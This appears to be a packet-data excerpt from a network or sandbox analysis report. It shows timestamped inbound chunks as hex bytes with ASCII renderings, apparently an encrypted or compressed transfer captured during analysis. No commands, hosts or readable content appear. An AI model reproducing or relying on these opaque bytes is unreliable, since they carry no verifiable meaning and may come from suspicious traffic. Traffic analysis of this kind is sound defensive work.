2022-11-29 23:31:36 UTC	56	IN	Data Raw: a5 56 5e a3 07 a2 51 64 c0 da 6e 3f e4 d0 da 23 9b 59 0a 95 1c 2c 4e 86 28 78 78 cc 25 60 e7 5d 41 5d 8e 69 4b 23 9e 03 d1 d1 04 95 40 be 62 92 3d 3f a3 06 6a 4e de 22 34 42 3f b2 bf d7 00 49 f2 ab f8 85 85 8d 98 b0 ae 59 d4 a8 51 62 1a ab da a1 34 55 80 f2 d7 3f ab e4 1d a5 c2 a6 aa f4 19 e9 b9 f7 7d 9e ab 0a 4a 26 df bd b7 e5 5c 62 2b 38 24 f4 1a 5a 08 e3 53 7a a1 3e d3 1c 7a 83 ba 96 a9 af 74 f3 24 1b 76 a9 65 5e 76 3b 77 69 87 63 75 89 14 f9 11 be 84 9f a3 66 fd 9c 1c 36 14 e0 12 06 be 57 e5 f9 77 d8 d1 8d f1 07 a5 e7 23 89 ef 1f 5b d8 1b 86 a4 e9 e3 c2 47 be 89 b4 42 9f 73 f0 20 5e f3 9a a9 a2 52 09 53 fa db af 49 d3 06 89 2c 77 b8 a8 93 e6 d5 53 aa 87 5a 9c f4 b4 ed f0 79 d6 6a 79 e0 45 28 d4 d1 4e ef 7f e4 ff 34 79 58 2a aa 4e 03 33 f2 53 98 fd 43 Data Ascii: V^Qdn?#Y,N(xx%`]A]iK#@b=?jN"4B?IYQb4U?}J&\b+8$ZSz>zt$ve^v;wicuf6Ww#[GBs ^RSI,wSZyjyE(N4yX*N3SC
2022-11-29 23:31:36 UTC	57	IN	Data Raw: 3c 6d 70 95 36 66 6e d2 5d 05 59 e7 d9 33 aa 9c 31 3b 92 ae 3a 9f b7 fd 01 f7 fe 3e 82 4e d5 91 c6 e9 74 24 c9 aa 9e 7a 7c 52 64 76 29 6c 24 ff 62 fa 22 b3 70 36 86 e0 ed ea 2c b7 04 93 74 fe 22 31 d1 8a d5 91 51 55 e6 b6 12 67 c6 4c e0 04 92 6a a8 92 c0 2b 52 93 df f4 11 af b5 d4 f1 5a e9 d5 e3 bc d4 e4 b0 04 ec 11 9f e2 9f 44 5c 98 e2 82 7b d6 e4 91 1c 4c f8 31 81 fc e7 da 5a 54 ed 44 7f 25 0a 0a d0 76 95 87 e2 69 df 80 95 fa f5 07 30 6c 1a 07 5d 3a b3 a6 a6 d1 70 1f 5b af 76 0e 2b 21 7d 06 65 a0 90 22 a8 84 c5 e3 fb e4 99 5e d1 b0 8e 4d 0e 6b 80 4d e2 f6 f7 e5 8c 4e cf ad b8 2b 0c 52 1c 62 cf be 65 ba 61 69 4a bc e7 94 dd 42 b3 fa ce b3 8a 56 d5 28 39 80 7f 2f 3f a0 03 ea 1e 31 e9 14 b7 e6 db 03 f1 b8 1b 14 12 85 c2 f6 6a 85 9c 9b a3 c2 bf dc 5e e5 2b Data Ascii: <mp6fn]Y31;:>Nt$z\|Rdv)l$b"p6,t"1QUgLj+RZD\{L1ZTD%vi0l]:p[v+!}e"^MkMN+RbeaiJBV(9/?1j^+
2022-11-29 23:31:36 UTC	58	IN	Data Raw: 35 8a 52 b9 39 e0 97 df 09 a9 62 d8 bc f5 aa af 20 fb 5c 74 06 e2 7c 7f 74 ed 93 e0 c2 a3 cf 07 0c 5f 9b f6 9d fe 8d f2 da 36 53 84 26 0c c1 43 9f a9 dd 7d 61 45 2a 68 ae 4b 22 3e 21 50 a6 03 73 d4 3d 64 20 e5 6c bf 7a 91 57 28 42 de de 1d 9c c5 da aa 27 bb 1e cb 64 dd a4 88 ad 2e 27 8a 2a 18 b5 76 6c ee 7f 42 22 a6 13 31 25 83 e0 fd cc 5a 62 66 f2 64 d3 cf ab 51 06 c4 ce ef 9e c0 34 bf 49 ea 05 0e 51 a2 89 7c cc cd 75 77 45 b9 4f e0 a7 4b 31 41 06 52 16 8a 5d 7c 79 7c e9 48 cd 08 7b 6f 6f 28 31 79 07 71 a5 5a 23 92 0a 78 96 34 b0 5e 74 55 fc d7 1d 58 7a 1c 19 84 56 2a 09 75 36 a3 66 86 41 7c e1 34 ba 2a e4 2e 9b 2b 6e d0 a7 d3 c8 b6 3a 3f a1 a7 ec 95 98 45 83 0b 97 bd 7d 80 1d ed 43 e2 d1 9c 69 37 d0 24 4f 1e 02 df 7b 52 12 00 d3 2c 55 91 9c 56 a5 7f 75 Data Ascii: 5R9b \t\|t_6S&C}aEhK">!Ps=d lzW(B'd.'vlB"1%ZbfdQ4IQ\|uwEOK1AR]\|y\|H{oo(1yqZ#x4^tUXzVu6fA\|4.+n:?E}Ci7$O{R,UVu
2022-11-29 23:31:36 UTC	59	IN	Data Raw: 35 f8 40 87 67 8d 40 8f 27 b2 91 68 8d b1 0f 97 3f 1c bc 81 93 5b af 7e 9b 73 2b 0d ca 97 b6 a0 a0 64 bb 20 ae 6e 93 a1 b5 61 9d 07 46 6f ba 8e f9 90 b4 30 7d fa f4 f7 cb 40 df e8 9f 31 6e 0c bc 18 3c 96 f0 10 6b 18 b2 7b d7 23 11 fa a8 fe cf a3 e4 22 82 e7 59 85 8e 49 e9 07 57 93 f4 ae 1d 7d c0 f1 68 f1 67 68 82 b1 b4 11 2c 33 e9 6f 97 59 ab 34 fc 6b b3 89 8d d6 25 3f 36 e4 8e 56 74 06 a5 1d 8c 83 12 89 6c db 0f 54 1f 4a c7 70 e2 7e d9 ad 4a 19 3d 45 7f b7 9a 41 23 54 60 a8 03 2f af e2 33 6c ac 94 f3 b6 78 74 ba 00 b4 6a ab ce 4e 72 8a ac 11 9a 68 a6 d0 e1 1d e2 8b 54 35 a1 37 f8 7e 52 98 08 b6 a1 52 0f 0c 33 6f 6b 50 a3 8b db 7d 96 7c b8 c6 83 f5 6b 6c 98 95 15 cf 92 86 27 02 a7 63 53 34 a7 6e 46 07 83 a6 42 42 8e 16 34 11 df 8e ba 0e 0f b3 08 d0 84 84 Data Ascii: 5@g@'h?[~s+d naFo0}@1n<k{#"YIW}hgh,3oY4k%?6VtlTJp~J=EA#T`/3lxtjNrhT57~RR3okP}\|kl'cS4nFBB4
2022-11-29 23:31:36 UTC	61	IN	Data Raw: 5e 6a 54 03 4c 38 5a 70 63 a0 d2 e0 aa f9 28 53 8b c4 0a 86 63 4e d1 bb eb 4e 0c ec 28 a8 0f e4 30 26 25 ba 28 bf 9c 79 20 6d 10 ed 23 cf ec e2 a4 dc 89 9f b8 b5 da cb 02 8c e8 58 65 9d b2 96 8e fd 14 07 ca 72 bf cd 49 48 17 c9 5d ae a9 38 48 20 9a 4a 32 39 32 a9 5e 9e 5e 6a 57 74 e2 d1 4c 19 af a6 9e fb a4 7f 79 0c e0 2d 3f 0a cb 95 09 ea dc 7d 90 41 87 fd eb 39 12 dd e8 d6 05 e6 cc 48 0b 0b 79 8c 91 1b 84 8d 8f e0 f5 34 40 20 59 94 d3 91 a6 b1 f7 fc e3 5a 7b 44 b1 2f f6 b5 b1 fc e3 d0 25 08 6a 22 c1 23 ac bd 50 40 85 b0 b4 fc 7f 38 36 b1 40 24 35 3a b2 ca 2b 98 e9 9a 68 4a 5d 38 68 08 ad fb 46 7d 06 33 b1 b3 51 61 61 56 ff 3e e8 e5 49 b2 40 fa 4e 58 46 d6 7d 8d b3 ca 7c 56 ef a4 ac a2 89 a4 e2 54 87 59 1d 04 f9 8f 02 12 1f 7a 3d 1d 0a 15 7b 9f c6 75 ce Data Ascii: ^jTL8Zpc(ScNN(0&%(y m#XerIH]8H J292^^jWtLy-?}A9Hy4@ YZ{D/%j"#P@86@$5:+hJ]8hF}3QaaV>I@NXF}\|VTYz={u
2022-11-29 23:31:36 UTC	62	IN	Data Raw: 16 99 a4 df 4a 5e a0 ff 0a ec 65 07 f1 5b 24 73 74 03 37 fd 2c 5f 78 cb 55 c6 ee 0a 07 bb c2 6b 3c 77 17 21 c6 c8 51 cd 47 61 8e 58 84 1d 50 d9 a6 87 09 82 06 f1 cb 49 9a dc 60 68 42 5e 5a 49 5e 5b dc 12 78 da de 13 97 22 73 49 88 1a 7d 16 4e d1 c3 68 9b 70 c4 79 83 6e 20 64 e6 2c ae 8d 2a bd d2 6e 4f 59 2a 14 dd 45 dc 89 24 8a 7a 34 e6 eb 87 a9 48 ee 16 60 c8 f8 5b 28 84 73 ec 7a d7 fa 42 ab ae ad b8 78 9c dc f0 b6 84 1d 46 6d df e6 cc 95 21 16 df 7e 3b 90 4e 47 07 b6 7a 67 9c 64 52 03 65 d8 42 95 32 d1 91 95 a1 0a 2a f7 a6 57 24 f0 ae 7c 98 15 d2 bb 72 e5 7a 53 50 bd 34 91 4c 00 cb 14 b4 04 b9 09 4a 54 50 88 f0 5c 12 36 38 a1 83 fd 53 6c 56 88 e3 a9 8e c2 82 9a 3c 5a 5f ae dc 54 f5 ab 12 d8 70 fa 65 e9 29 79 79 d7 ba 9c 05 a9 d2 54 f2 e4 9d 99 a2 69 e5 Data Ascii: J^e[$st7,_xUk<w!QGaXPI`hB^ZI^[x"sI}Nhpyn d,nOYE$z4H`[(szBxFm!~;NGzgdReB2*W$\|rzSP4LJTP\68SlV<Z_Tpe)yyTi
2022-11-29 23:31:36 UTC	63	IN	Data Raw: b0 2e 6d ac f4 d4 e9 04 e6 19 61 aa 61 75 b3 b0 5a 2d 44 b1 19 77 14 a6 ac a8 f7 e6 41 6a 27 a4 5b da 42 af 00 f8 13 1c c9 11 52 36 b1 43 ff 12 8b 5a 47 ba f0 d0 cc 80 14 b7 08 5b a0 e9 56 58 26 e7 d6 86 74 53 cd 72 11 97 84 9a f7 a1 9d 60 c3 4e db e8 9e 24 50 8c 69 65 13 87 e0 d5 da 89 ce d0 c2 ec 2c 2b 44 3a b6 51 87 2a 76 d7 20 4b fd 48 3c fe 75 31 d7 06 8f aa ae 42 17 d2 66 68 2f 89 9e c8 67 46 0e 85 9b 00 15 67 cc 61 47 b8 36 dd f4 ec 6a f9 92 5a ec 3d 25 49 7a 64 b5 fd 92 e2 03 f9 a6 0f 0b 7f 5d 79 9e 07 88 50 c0 1f fc ff 90 b8 0a 38 48 e3 cb 9a 9c 2f c3 2d f7 d7 20 67 e8 4c 06 5d 2f 67 68 47 8d 9f ac 59 7d ab 14 92 5b d3 e2 e9 43 8e d1 c4 89 cb b3 53 04 f0 1b 2f bd 0f ab 33 df c5 92 14 e1 b6 52 7a 90 c0 3f 42 2a 34 87 a2 4d da 0c 61 ce c6 02 3d d7 Data Ascii: .maauZ-DwAj'[BR6CZG[VX&tSr`N$Pie,+D:Qv KH<u1Bfh/gFgaG6jZ=%Izd]yP8H/- gL]/ghGY}[CS/3Rz?B4Ma=
2022-11-29 23:31:36 UTC	64	IN	Data Raw: ba d3 49 11 76 2e 0f a9 58 b9 85 bb 10 d7 85 41 50 25 7d 7e 09 46 b7 0e 73 d1 e8 ed a5 be 82 3a 40 86 f2 4e 63 38 e1 4e 66 4c f5 18 2f 27 aa 59 fa bd c5 d3 d5 53 28 cc 44 db 78 dc 50 35 5b 11 67 f2 b1 0d 1c c9 36 7f 65 03 0d 95 cb 12 84 55 82 d0 a9 bd 51 52 a1 05 22 66 b1 ef 4a e9 b0 7a 24 8d 7f 25 fe c9 6b 83 9e d0 75 54 7e 01 d4 ea bb f8 b1 3b 03 be 58 68 a8 3a f6 17 6d d3 23 42 36 3b 93 84 3d fb 65 0b bb bb 6c c7 ed 02 03 1e 32 ae 38 e0 2f 7f 54 cb b1 51 80 55 e9 e5 7a 57 9f ce cd c7 2b e5 f8 66 93 68 5f 12 af d0 b8 3b 78 0c d0 a6 bd 50 d9 7e fa 99 db 54 4d da da 49 a0 11 cc 0f 39 9d 9c ac 29 e4 e5 d7 c6 73 ca a3 93 58 b1 c6 22 a7 c7 91 a3 17 d4 34 8e f9 98 cf dc cb ca 76 77 29 69 a0 63 fb b0 5e 88 cb 44 60 22 ee 9f 54 c7 8b a3 59 68 c7 7c 95 1f 23 79 Data Ascii: Iv.XAP%}~Fs:@Nc8NfL/'YS(DxP5[g6eUQR"fJz$%kuT~;Xh:m#B6;=el28/TQUzW+fh_;xP~TMI9)sX"4vw)ic^D`"TYh\|#y
2022-11-29 23:31:36 UTC	66	IN	Data Raw: 3c bf c8 48 43 ce 80 86 b5 f0 5a 95 95 db 8f 13 05 ca 59 ee 9b b5 88 9a 55 bd 5a d9 52 f5 68 1b 58 45 a8 43 53 5d 5a c1 55 e4 51 b8 39 b7 11 2a 7c 2b d0 d4 6b da a1 5b ca 6d 06 f8 5d a5 4b 0f 72 e9 a2 60 7d 6b c6 8e 6d ec db 6a 36 9b 65 7a b0 9a 6c 0f 17 d4 bc c3 0b 15 98 a0 8b ea 3a 39 Data Ascii: <HCZYUZRhXECS]ZUQ9*\|+k[m]Kr`}kmj6ezl:9
2022-11-29 23:31:36 UTC	66	IN	Data Raw: e0 8c 03 f5 7a 90 6f af 53 f8 76 f4 99 37 95 f3 ed ea 09 6a f2 28 e8 96 f0 10 35 72 8a a8 7a c9 4b 8d 12 8b 78 62 2a 64 1d 04 90 3e e1 dc 64 0b 15 72 76 b9 6a 43 59 87 65 ee 6e c9 bd ca 03 10 84 9c a4 2a 57 3f e5 24 56 6b b3 89 95 3b e8 96 1b 9f 21 57 ed 70 68 bb 77 40 2a 6a b1 b8 8e 54 e1 b5 a1 b1 50 7b e7 da f8 64 d2 48 06 93 3b 4d 2a 22 f9 de 4e a3 c9 23 a1 7d 24 c3 6b b6 0c b3 eb a8 f0 2b c3 b9 f4 71 47 ef df 6a 1e 23 b8 1f b5 90 f1 60 ee 3e 0f ba 57 54 66 f7 fe 2a 8e a6 8e 76 4f 7d 2f 3b d4 24 f6 4e 36 b8 62 83 f5 6b 73 43 c9 18 c8 47 16 b4 9a a7 17 10 33 7e 2c bf 84 82 a6 d5 67 e6 5e 3d 86 d7 4b 84 a1 18 39 4b 97 7b 29 93 67 f2 37 97 e8 c4 64 39 e6 91 18 bc 3e 51 83 99 40 3c 6d 34 3a 10 e3 d1 60 7a a6 cc ba c1 b5 21 81 f7 50 85 0a 9b 31 3c a0 34 cc Data Ascii: zoSv7j(5rzKxbd>drvjCYenW?$Vk;!Wphw@jTP{dH;M"N#}$k+qGj#`>WTf*vO}/;$N6bksCG3~,g^=K9K{)g7d9>Q@<m4:`z!P1<4
2022-11-29 23:31:36 UTC	67	IN	Data Raw: 7a a9 9e d8 a8 ec 80 89 49 36 c7 45 c4 f8 a3 ff 67 28 bc 5e cb c8 03 19 f2 d4 05 a2 ef 91 0a 1d b7 96 2c a4 91 8d 15 1d 44 83 9c 01 5c b1 38 6e 9d 64 84 58 09 86 36 ff e8 e9 c7 ef 77 36 ff 01 9c 0a 49 8f 5e 9c 56 ab 0a a0 b3 37 38 d0 91 99 3c 5b 11 91 4a 2b ad d2 7c 52 44 c0 3d b5 b9 81 73 c0 d9 56 6c 50 dc 59 eb ec 90 8f db 5a 7b 7f 4f 72 5b 74 c3 ac 0b 18 51 f4 e3 f1 d8 53 0b bd 2c 47 d2 9f 57 4a af 34 bb 9d 4f 20 35 76 0f 99 48 77 81 ca e5 4e 81 0c 5b c8 bd 4c 1d 0c 72 29 67 35 c7 e2 cf 5c 14 49 8f a0 49 5a 4e 4a c9 48 28 d6 17 63 35 58 f0 e8 6a 8c d8 c6 e1 5b 2e 8b 04 f5 91 c6 7b e5 ea 43 58 ed d2 e2 bb 4c ca f1 08 7a 4a 75 62 75 e3 f8 42 8f f1 66 68 f5 c8 76 8e 89 6e 21 b2 81 c3 28 38 48 4a 47 11 eb 6d 64 5a 95 79 7f 56 52 c2 27 9d 78 25 4a de 13 5a Data Ascii: zI6Eg(^,D\8ndX6w6I^V78<[J+\|RD=sVlPYZ{Or[tQS,GWJ4O 5vHwN[Lr)g5\IIZNJH(c5Xj[.{CXLzJubuBfhvn!(8HJGmdZyVR'x%JZ
2022-11-29 23:31:36 UTC	68	IN	Data Raw: e9 7a e1 26 59 5b a4 b6 ea ce 40 a1 db 37 4b 5b fd 71 e1 aa a1 02 09 b9 aa ba 75 a4 94 1e 24 9c 4e 0e 48 ea 82 3f 34 c0 81 18 b8 d6 90 91 b5 0f 58 f6 d8 9a d5 de 9a 03 35 59 c2 8a dc e9 4b 2b 52 a1 7a a1 92 51 90 1a db 15 5f e3 e4 7f 3a 17 3b 46 b2 4b 14 6f 37 31 51 f2 1d eb 3d aa 59 13 bc e3 d1 e6 6c e7 9a 95 91 00 20 81 51 db 88 7f 4f 1e 72 11 35 cc 63 6e 99 ac 45 2a a7 78 4b 95 e1 c5 4c f2 56 ab 42 8f 27 08 c8 76 e1 b5 67 6d c4 0a fc a2 df 2f b8 4d 78 9c ac 57 b9 aa 40 ab af 86 f8 bd f0 3d a8 a3 eb e0 12 06 bb c0 78 2a cf 91 bb 64 61 62 21 a6 dc 54 d4 fc 12 d8 c0 fe a6 d2 04 01 40 ad 7a 24 52 90 45 93 2f fa ae 33 fd 41 ee dc 43 a9 b8 bc 5b 85 6e 3a 82 b5 7c 4f e0 cd 51 25 3f 7d b9 0c 29 ac 68 ee 34 49 d1 79 d3 85 fd f8 cf 86 d3 ea bd 16 cc 12 c7 28 4f Data Ascii: z&Y[@7K[qu$NH?4X5YK+RzQ_:;FKo71Q=Yl QOr5cnExKLVB'vgm/MxW@=xdab!T@z$RE/3AC[n:\|OQ%?})h4Iy(O
2022-11-29 23:31:36 UTC	69	IN	Data Raw: 58 87 95 fd 7c 90 bc 94 e7 38 f9 5d 36 66 83 a3 91 68 5b 6c 37 de 85 bb 98 d6 4e 0b 50 c0 06 a1 85 b6 a5 cd 07 5e 0e c4 e7 36 74 24 63 50 24 2f 12 ec c0 4a ce d1 fe 04 f5 79 c2 7b e5 ea 74 08 12 2d 5a 8b 96 57 78 be b6 a4 e2 08 70 8b 06 2c cd b6 71 60 ba 4d b6 78 63 0a 92 8e 4b 2f c3 00 10 5d 10 2f eb ba 0e a5 82 15 b3 c0 ec a8 43 10 ae 64 cd c9 9a be 2a 61 15 46 86 ea 34 76 60 0b ae fc d9 42 3f 2a a5 4e 6b 78 b7 5b ea b0 83 7f c3 b7 d3 d7 20 67 e9 4e 04 a2 5a ef 1a 37 39 33 b5 b1 5e 78 8e 92 ce 50 4c f1 e1 78 98 b3 2c 48 b7 98 78 7b 46 d8 de 7b a3 03 9e 2d ea 6c f6 cc 88 41 5b 78 0f 5b 2c ef fa 48 94 a9 59 ea 22 12 86 21 fe 86 e3 7a e7 5d e6 b5 62 bd b3 41 9b 50 34 56 d5 2a 74 83 d8 55 1b 11 a7 d0 5e 31 1a e2 d4 cf ec 59 87 74 e4 12 ee 75 c9 70 ef 7b 63 Data Ascii: X\|8]6fh[l7NP^6t$cP$/Jy{t-ZWxp,q`MxcK/]/CdaF4v`B?Nkx[ gNZ793^xPLx,Hx{F{-lA[x[,HY"!z]bAP4V*tU^1Ytup{c
2022-11-29 23:31:36 UTC	71	IN	Data Raw: 01 13 40 80 58 9c f4 b2 06 e7 b1 ba 92 f9 0e 0e 2e 19 62 d8 44 89 32 d9 82 51 50 9c 25 9f a3 d3 d2 78 42 d8 21 95 5f d6 fb b3 03 80 27 5d bf ba 35 fa 1a 21 18 a3 6e 43 9f 59 bf 0e db 02 24 64 49 58 51 43 99 bc 59 fc aa 7a 54 5d f7 0b 79 a4 d8 ad 5c c9 da 3b bb c0 66 17 24 55 78 39 47 ea 12 97 a5 12 ae 98 79 b9 c0 be 33 47 b7 11 80 bd 2f 9a 2d 3d 86 56 24 2d 69 cf 4b 6a 1a 47 ae 22 6d c1 9f b2 d5 7d a2 cc da 63 b3 31 9c 78 72 d1 3f 1a 54 bb cf ef 94 56 8a 78 d1 f1 c9 41 06 82 5a 2e c8 df 4b 73 c5 48 cd c8 63 c9 fa be 31 79 c7 11 03 cf bf fa a0 75 40 c3 4d fe e1 f6 fc d7 dd 5a e2 6a b3 44 b9 1e e8 21 af d5 45 bf 9a 5d 4a 7f 1f 26 00 c5 a2 90 29 77 ab 3b 13 8d 81 7a 06 ab 16 46 a5 fe c0 ac 9b 1e 96 b1 a6 d0 8f 44 3e 80 92 0d 77 b1 07 f1 36 4a 33 f7 87 14 3c Data Ascii: @X.bD2QP%xB!_']5!nCY$dIXQCYzT]y\;f$Ux9Gy3G/-=V$-iKjG"m}c1xr?TVxAZ.KsHc1yu@MZjD!E]J&)w;zFD>w6J3<
2022-11-29 23:31:36 UTC	72	IN	Data Raw: d5 ef bc d8 06 5c 6a c5 33 f8 47 b9 84 ad d2 5e c8 28 09 1e 37 1f 3d 8f 3d f3 b0 34 95 fc 36 af b4 e4 7e 44 25 64 2e d6 1a ab f6 03 c3 81 65 0f 2c 17 88 8b 41 80 7e fb e3 e6 06 3d f3 3e bf 71 ad 4a ae 00 ea 2b cc a9 60 26 3c eb e3 cf 5f 58 9a 49 93 2a fe 36 19 2c c3 4e c7 25 9f 77 88 aa 7c 45 12 1a c9 42 db 19 48 34 e3 82 1e a7 8c 64 3f b3 13 84 08 3a 0e 76 31 b6 67 41 42 ff 09 10 54 f5 48 ea b6 74 17 20 57 69 60 99 02 1a 64 aa 0d 1e 1b ca 86 3c e4 13 cf 98 36 69 e5 fd d2 81 cc 55 75 85 86 ef cf 70 28 2a 8c 87 55 38 15 5b 1d 0c 75 72 8a 18 5d ac f7 16 86 cb fb 3c f6 a4 d2 a6 d0 62 8e 77 85 d1 97 9d 9d b4 d7 29 75 2c e5 f7 55 e8 63 a8 55 ad 8f ae 1f 7a 9c 2a ab 57 74 24 60 ec 63 ae 91 15 e9 f1 ae 20 40 3e 15 9d 24 4c 62 7f 0e 24 33 59 25 07 53 4c 19 34 42 Data Ascii: \j3G^(7==46~D%d.e,A~=>qJ+`&<_XI6,N%w\|EBH4d?:v1gABTHt Wi`d<6iUup(U8[ur]<bw)u,UcUz*Wt$`c @>$Lb$3Y%SL4B
2022-11-29 23:31:36 UTC	73	IN	Data Raw: 07 26 eb 90 f1 5d 2b 87 2a 61 64 62 79 f3 c3 06 74 58 de 69 70 d9 3f f1 4b 5d 7c 79 19 db 2e 12 65 6c b0 90 d7 01 18 f2 84 a4 5a 57 d4 3e 9d db 9d 7b 48 60 87 65 a1 df 10 61 ce 19 1d 54 ea 5d d2 90 07 57 e7 25 f9 e0 34 13 a4 be 8e d4 2a c8 76 f2 9a 2a 44 9a 4b bb 9c a6 75 a7 57 ff 18 e5 5e a3 60 89 7d da 0d 1d e5 8f a3 49 bd a0 d2 51 47 ef d9 8b ef 1f 51 cf 05 14 cf 4a b3 3a aa 5d d4 39 12 dd c8 03 2a 1c fc 91 28 74 74 50 92 f4 58 0a 11 31 ee 79 63 53 37 98 e5 70 ea 61 1f 33 bc d3 3e d2 3d e7 5f 05 00 ba 4a 93 4c e0 79 47 b3 51 77 86 bf 34 36 bc 9f 9c cd d4 b5 37 57 2a 05 86 e1 e6 c4 82 10 73 ab c9 99 08 08 a2 8e fc 72 1c eb 5f a9 9c 08 ba 53 3a cb 88 12 e1 a7 02 1d 90 28 d1 69 26 24 4b b3 ef e1 62 1c 1f ca 12 cc 56 39 60 13 62 fa 17 69 68 4f 80 4e 9f 60 Data Ascii: &]+adbytXip?K]\|y.elZW>{H`eaT]W%4vDKuW^`}IQGQJ:]9(ttPX1ycS7pa3>=_JLyGQw467W*sr_S:(i&$KbV9`bihON`
2022-11-29 23:31:36 UTC	74	IN	Data Raw: 8f 52 b3 ff f9 e1 10 1a b9 26 fb 08 d5 ac 06 68 46 9f 04 27 bb d6 71 34 cc 03 37 dd 5f c2 2d e5 08 62 e1 e2 e5 bd c0 6b b6 b4 00 98 70 b2 92 58 b8 f4 03 8a f0 e4 e1 26 f1 59 64 5a 90 f1 cb 72 06 ca 3f 3b c2 b4 d2 58 63 68 84 8f 76 33 7c 2f 3b 47 e2 73 58 0e c2 e9 57 6c 1d be dc e7 af f0 2a cc 59 9a a7 11 55 c0 d5 14 c5 a9 83 89 af 83 fa 50 bb f7 d7 6a 80 a1 18 ed 60 99 fe 4e ec 1c f3 98 67 5e 41 b3 48 de eb c0 4d 77 2b 59 47 ef 8b fa be 00 6b 81 d4 9a 57 f7 c3 cb c1 b9 25 81 f7 00 40 c6 b7 a6 ef dc 4b 0d c5 14 3f db 84 2d a7 9b 2e 95 e1 1f 03 97 a9 42 99 f2 1a 83 30 65 32 dd 4d 1e cf ad fc 28 00 1c 4c 3b ef 6a 23 9d 8f 6a 91 64 43 20 5c 5e 11 61 6b c9 66 07 e6 90 41 57 81 56 5e c2 82 0d 0c b1 97 07 8f 34 22 11 ee 27 0c d6 2a 05 e3 be d0 cd e9 27 8f 4d 61 Data Ascii: R&hF'q47_-bkpX&YdZr?;Xchv3\|/;GsXWlYUPj`Ng^AHMw+YGkW%@K?-.B0e2M(L;j#jdC \^akfAWV^4"''Ma
2022-11-29 23:31:36 UTC	75	IN	Data Raw: 5b 0b 07 ec 4f fe f8 cb a7 6e 74 77 0f cd f1 62 63 76 6d ef 0b 37 58 2a 3c f8 d6 b2 d7 b7 07 e2 47 ed f5 9f f0 69 01 4f f9 1f 9f c9 3c 2b e5 29 cd 2c 1b dd 08 25 2a 80 8f 91 9f a9 97 3b 53 0e 4a 61 0e 2e cc 87 80 f3 99 eb 55 14 77 4e 65 61 4c 7c 5b fd 27 b1 52 41 46 90 58 2c d6 7f a3 b6 7b 0f ff 79 50 53 64 02 54 88 11 f2 92 81 8d 3a e5 02 2e e0 67 25 81 79 2d 6c 8b 75 ad 47 bf 6a 2c ba 2b 71 83 32 3e 97 ac 4d e5 13 be 1c ae 24 99 46 80 e3 a4 9a 47 47 03 d3 20 fd 00 6b 99 b6 56 36 17 23 79 02 c3 cd 6c 45 5c ed 3a cf 4e 6f bc 7a e8 bd f1 a7 18 28 25 fd 7d dd 25 c5 3a 93 5b 37 85 c7 2d 72 6d d7 54 f5 6b e2 16 27 a5 1b ce 25 ba 8d 56 46 6a c6 28 34 21 90 52 b4 49 a5 41 56 9a b7 06 da 97 0f 7c 4f 03 64 5f 4a 76 cf 5e d8 f6 b8 d3 dc ea 90 bb 04 19 b1 1b ac 9e Data Ascii: [Ontwbcvm7X<GiO<+),%;SJa.UwNeaL\|['RAFX,{yPSdT:.g%y-luGj,+q2>M$FGG kV6#ylE\:Noz(%}%:[7-rmTk'%VFj(4!RIAV\|Od_Jv^
2022-11-29 23:31:36 UTC	77	IN	Data Raw: b0 c7 01 da a3 42 25 54 57 f8 b6 06 46 68 9a 57 2c f9 5d b9 6c df 4d c8 09 9d d3 77 0f 2e b9 16 63 d2 f2 6c 27 bd 17 b0 ee 91 ba 95 a9 e7 4a ef f4 2f ca b7 2c a7 9b 8d 5f a6 c2 d3 ac 0a 28 cc 4a 52 84 d6 35 0a d4 da 74 85 d1 90 20 96 16 e8 29 6b c6 ae c7 fe e5 f3 54 38 95 9a 6e 2e e6 2c 42 58 ae dc bc 34 93 fa 81 9b 3e a5 16 1c 2b 83 cd ec 23 ea 21 65 54 54 38 6a 4d 77 74 42 30 02 29 50 f2 2b 85 91 7c b6 c9 cd a7 f7 e6 f3 6d aa 87 52 a8 b9 ba 80 06 62 ad 2e 20 be 1a f5 ff 98 4d f5 dd 7e 29 47 96 3d ac 64 4e 6b e1 26 8c e7 f9 00 b2 f2 0e 50 06 c4 e5 9d 05 d3 a9 c5 ac 04 05 84 3b d4 79 d2 cd e2 d7 d2 99 b7 15 95 1d b8 ea 46 83 d7 2f 55 a2 08 46 11 38 6f 40 04 96 99 13 2f 55 86 89 3c 89 d1 db 66 8b 12 1e a9 28 a0 d6 68 92 5e dd 73 68 b2 b7 b1 89 c0 c5 1b 41 Data Ascii: B%TWFhW,]lMw.cl'J/,_(JR5t )kT8n.,BX4>+#!eTT8jMwtB0)P+\|mRb. M~)G=dNk&P;yF/UF8o@/U<f(h^shA
2022-11-29 23:31:36 UTC	78	IN	Data Raw: 95 71 be 5b 07 51 db c0 95 17 04 04 3f b8 b8 69 b5 57 1b 7a 99 be 3f 9a 87 47 c4 6d ac b9 2d f0 1d 5e d9 d4 07 0b ff b4 94 20 f8 63 c8 50 03 3f 27 5e 9c c4 51 df 5e ee 60 85 c7 69 5b 6d d7 86 5d 65 63 ce f2 b2 97 99 72 e9 ee 1d da 51 25 f4 92 d0 68 71 19 eb 61 7b b0 ee b8 06 da a1 0f 62 4d eb 54 96 73 d3 cd 3e d8 7c 3f 04 10 ae ca 0e 1a 73 b1 f1 fb 98 82 49 9a 31 6e 3c dd 0d 2e 96 f0 6c f1 6a 95 cb 2a b2 89 8c b4 f7 d4 d6 a1 f3 84 f5 db 45 c5 57 9c 0c d9 9e 4f c2 d1 e4 95 b8 76 ec 0f b0 b8 47 4b bb f0 8f c5 ca aa 76 22 22 f6 b1 8b 73 01 4d e5 b2 1c 3d 78 a9 41 bc e3 7a 6f 98 10 a6 e5 10 f4 6b ef 30 6d f8 97 fe e8 4c bb 99 5b cc ca 6f d5 37 89 7f e6 dc 07 a3 44 2e ba a8 ac 7b 84 49 87 74 3f 75 4a 42 cd 55 f4 bb ef 91 57 1e 7c 03 75 44 a2 22 25 cb 35 34 e0 Data Ascii: q[Q?iWz?Gm-^ cP?'^Q^`i[m]ecrQ%hqa{bMTs>\|?sI1n<.lj*EWOvGKv""sM=xAzok0mL[o7D.{It?uJBUW\|uD"%54
